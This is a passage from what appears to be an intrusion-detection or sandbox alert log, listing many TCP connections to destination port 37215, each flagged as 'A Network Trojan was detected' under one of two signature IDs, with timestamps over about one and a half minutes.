                  Source Port:53554
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.380446
                  SID:2835222
                  Source Port:50136
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.144777
                  SID:2835222
                  Source Port:53562
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.081032
                  SID:2835222
                  Source Port:50890
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.882242
                  SID:2829579
                  Source Port:34928
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.456446
                  SID:2835222
                  Source Port:54282
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.365317
                  SID:2835222
                  Source Port:60552
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.378421
                  SID:2835222
                  Source Port:58030
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.900584
                  SID:2835222
                  Source Port:60878
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.559907
                  SID:2829579
                  Source Port:33708
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.633686
                  SID:2835222
                  Source Port:43918
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.298616
                  SID:2835222
                  Source Port:33216
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.146612
                  SID:2835222
                  Source Port:59128
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.420530
                  SID:2829579
                  Source Port:39540
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.752845
                  SID:2829579
                  Source Port:38790
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.784131
                  SID:2835222
                  Source Port:40020
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.005251
                  SID:2829579
                  Source Port:46630
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.460773
                  SID:2829579
                  Source Port:54494
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.524945
                  SID:2835222
                  Source Port:52448
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.071295
                  SID:2829579
                  Source Port:45200
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.487311
                  SID:2835222
                  Source Port:38936
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.433221
                  SID:2829579
                  Source Port:55516
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.156560
                  SID:2829579
                  Source Port:44436
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.675135
                  SID:2829579
                  Source Port:55576
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:48.009787
                  SID:2835222
                  Source Port:44608
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.815899
                  SID:2835222
                  Source Port:37732
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.005995
                  SID:2835222
                  Source Port:39598
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.824818
                  SID:2835222
                  Source Port:51120
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.121816
                  SID:2829579
                  Source Port:58196
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.635784
                  SID:2829579
                  Source Port:54916
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.775656
                  SID:2829579
                  Source Port:33908
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.583126
                  SID:2829579
                  Source Port:43706
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.968872
                  SID:2835222
                  Source Port:48746
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.187886
                  SID:2835222
                  Source Port:38540
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.995409
                  SID:2835222
                  Source Port:53360
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.631742
                  SID:2835222
                  Source Port:54208
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.587142
                  SID:2835222
                  Source Port:60502
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.713533
                  SID:2829579
                  Source Port:40912
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.541812
                  SID:2835222
                  Source Port:57398
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.029316
                  SID:2835222
                  Source Port:42386
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.080140
                  SID:2835222
                  Source Port:60730
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.583365
                  SID:2829579
                  Source Port:44620
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.999784
                  SID:2835222
                  Source Port:57198
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.746309
                  SID:2829579
                  Source Port:48336
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.015608
                  SID:2835222
                  Source Port:57702
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.159669
                  SID:2835222
                  Source Port:56236
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.356703
                  SID:2829579
                  Source Port:54312
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.456232
                  SID:2829579
                  Source Port:44208
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.983145
                  SID:2829579
                  Source Port:37216
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.165581
                  SID:2835222
                  Source Port:51136
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.792621
                  SID:2835222
                  Source Port:38210
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.479607
                  SID:2835222
                  Source Port:32874
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.402318
                  SID:2835222
                  Source Port:36370
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.934356
                  SID:2829579
                  Source Port:41874
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.417770
                  SID:2835222
                  Source Port:57974
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.666062
                  SID:2835222
                  Source Port:43238
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.888745
                  SID:2829579
                  Source Port:37356
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.153335
                  SID:2829579
                  Source Port:51704
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.218998
                  SID:2835222
                  Source Port:39362
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.883274
                  SID:2835222
                  Source Port:48710
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.174460
                  SID:2829579
                  Source Port:43708
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.217028
                  SID:2829579
                  Source Port:48508
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.405574
                  SID:2829579
                  Source Port:44174
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.525899
                  SID:2829579
                  Source Port:40654
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.906246
                  SID:2829579
                  Source Port:33588
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.844720
                  SID:2829579
                  Source Port:38680
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.505741
                  SID:2829579
                  Source Port:55072
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.848965
                  SID:2835222
                  Source Port:51236
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.956941
                  SID:2829579
                  Source Port:40936
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.553894
                  SID:2835222
                  Source Port:39116
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.467612
                  SID:2829579
                  Source Port:57938
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.494143
                  SID:2829579
                  Source Port:34212
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.140303
                  SID:2835222
                  Source Port:45824
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.179798
                  SID:2835222
                  Source Port:33690
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.995730
                  SID:2835222
                  Source Port:50730
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.530993
                  SID:2835222
                  Source Port:38394
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.251100
                  SID:2835222
                  Source Port:46846
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.345692
                  SID:2835222
                  Source Port:59158
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.423552
                  SID:2829579
                  Source Port:58056
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.780678
                  SID:2829579
                  Source Port:34304
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:16.998730
                  SID:2829579
                  Source Port:58072
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.171308
                  SID:2829579
                  Source Port:49880
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.797142
                  SID:2829579
                  Source Port:51828
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.648548
                  SID:2835222
                  Source Port:42462
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.168869
                  SID:2829579
                  Source Port:56786
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.645896
                  SID:2835222
                  Source Port:57242
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.802589
                  SID:2835222
                  Source Port:53682
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.839204
                  SID:2829579
                  Source Port:58128
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.446454
                  SID:2835222
                  Source Port:39754
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.528715
                  SID:2835222
                  Source Port:32890
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.366131
                  SID:2829579
                  Source Port:53516
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.786219
                  SID:2835222
                  Source Port:56488
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.505029
                  SID:2835222
                  Source Port:32988
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:48.000365
                  SID:2829579
                  Source Port:49898
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.627051
                  SID:2829579
                  Source Port:42530
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.315486
                  SID:2829579
                  Source Port:50676
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.207005
                  SID:2829579
                  Source Port:59282
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.596848
                  SID:2835222
                  Source Port:46504
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.686169
                  SID:2835222
                  Source Port:49948
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.327851
                  SID:2829579
                  Source Port:48000
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.483215
                  SID:2829579
                  Source Port:57270
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.534689
                  SID:2829579
                  Source Port:44050
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.415941
                  SID:2829579
                  Source Port:52116
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.151855
                  SID:2829579
                  Source Port:43902
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.861312
                  SID:2835222
                  Source Port:45394
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.418170
                  SID:2835222
                  Source Port:47166
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.156575
                  SID:2829579
                  Source Port:49744
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.381146
                  SID:2829579
                  Source Port:57924
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.283618
                  SID:2829579
                  Source Port:35836
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.787067
                  SID:2829579
                  Source Port:52530
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.489960
                  SID:2835222
                  Source Port:58924
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.556430
                  SID:2835222
                  Source Port:34702
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.180916
                  SID:2835222
                  Source Port:58510
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.628503
                  SID:2835222
                  Source Port:39986
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.989369
                  SID:2835222
                  Source Port:42154
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.483196
                  SID:2829579
                  Source Port:55996
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.256446
                  SID:2829579
                  Source Port:33182
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.867298
                  SID:2835222
                  Source Port:52936
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.382964
                  SID:2835222
                  Source Port:59184
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.837661
                  SID:2829579
                  Source Port:49634
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.128878
                  SID:2835222
                  Source Port:45360
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.353593
                  SID:2829579
                  Source Port:45170
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.206516
                  SID:2829579
                  Source Port:52180
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.557650
                  SID:2829579
                  Source Port:51802
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.869680
                  SID:2835222
                  Source Port:48556
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.389278
                  SID:2835222
                  Source Port:35626
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.780112
                  SID:2829579
                  Source Port:54360
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.418572
                  SID:2835222
                  Source Port:39246
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.448470
                  SID:2829579
                  Source Port:59530
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.900792
                  SID:2829579
                  Source Port:43860
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.822336
                  SID:2835222
                  Source Port:53000
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.828817
                  SID:2835222
                  Source Port:52098
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.941322
                  SID:2829579
                  Source Port:54670
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.309786
                  SID:2835222
                  Source Port:54644
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.593724
                  SID:2835222
                  Source Port:34426
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.122406
                  SID:2829579
                  Source Port:57074
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.811396
                  SID:2829579
                  Source Port:58128
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.638675
                  SID:2829579
                  Source Port:46860
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.555900
                  SID:2829579
                  Source Port:34124
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.250416
                  SID:2829579
                  Source Port:35356
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.446313
                  SID:2835222
                  Source Port:35716
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.767328
                  SID:2829579
                  Source Port:44662
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.656574
                  SID:2835222
                  Source Port:52516
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.198368
                  SID:2835222
                  Source Port:46294
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.763927
                  SID:2829579
                  Source Port:45568
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.639186
                  SID:2835222
                  Source Port:57408
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.263619
                  SID:2829579
                  Source Port:40930
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.959708
                  SID:2829579
                  Source Port:59724
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.449676
                  SID:2829579
                  Source Port:45792
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.302955
                  SID:2829579
                  Source Port:33216
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.273246
                  SID:2829579
                  Source Port:43198
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.598078
                  SID:2829579
                  Source Port:48240
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.208754
                  SID:2835222
                  Source Port:38492
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.941033
                  SID:2829579
                  Source Port:57468
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.578531
                  SID:2835222
                  Source Port:40272
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.289517
                  SID:2829579
                  Source Port:43806
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.507738
                  SID:2835222
                  Source Port:35094
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.865375
                  SID:2835222
                  Source Port:42666
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.204295
                  SID:2829579
                  Source Port:49080
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.500109
                  SID:2835222
                  Source Port:34242
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.749012
                  SID:2835222
                  Source Port:49886
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.485582
                  SID:2835222
                  Source Port:56444
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.864759
                  SID:2835222
                  Source Port:33528
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.660364
                  SID:2835222
                  Source Port:40668
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.410834
                  SID:2835222
                  Source Port:51880
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.537830
                  SID:2829579
                  Source Port:52870
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.514103
                  SID:2835222
                  Source Port:52622
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.037222
                  SID:2835222
                  Source Port:44340
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.145425
                  SID:2835222
                  Source Port:44726
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.412870
                  SID:2829579
                  Source Port:35502
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.427359
                  SID:2835222
                  Source Port:54434
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.775037
                  SID:2829579
                  Source Port:46862
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.436747
                  SID:2835222
                  Source Port:38498
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.674320
                  SID:2835222
                  Source Port:60156
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:48.005447
                  SID:2835222
                  Source Port:33712
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.152371
                  SID:2835222
                  Source Port:56298
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.373070
                  SID:2835222
                  Source Port:43526
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.040433
                  SID:2835222
                  Source Port:41384
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.690797
                  SID:2835222
                  Source Port:40674
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.247062
                  SID:2835222
                  Source Port:36212
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.441274
                  SID:2829579
                  Source Port:46184
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.366242
                  SID:2829579
                  Source Port:45044
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.290306
                  SID:2829579
                  Source Port:56698
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.356515
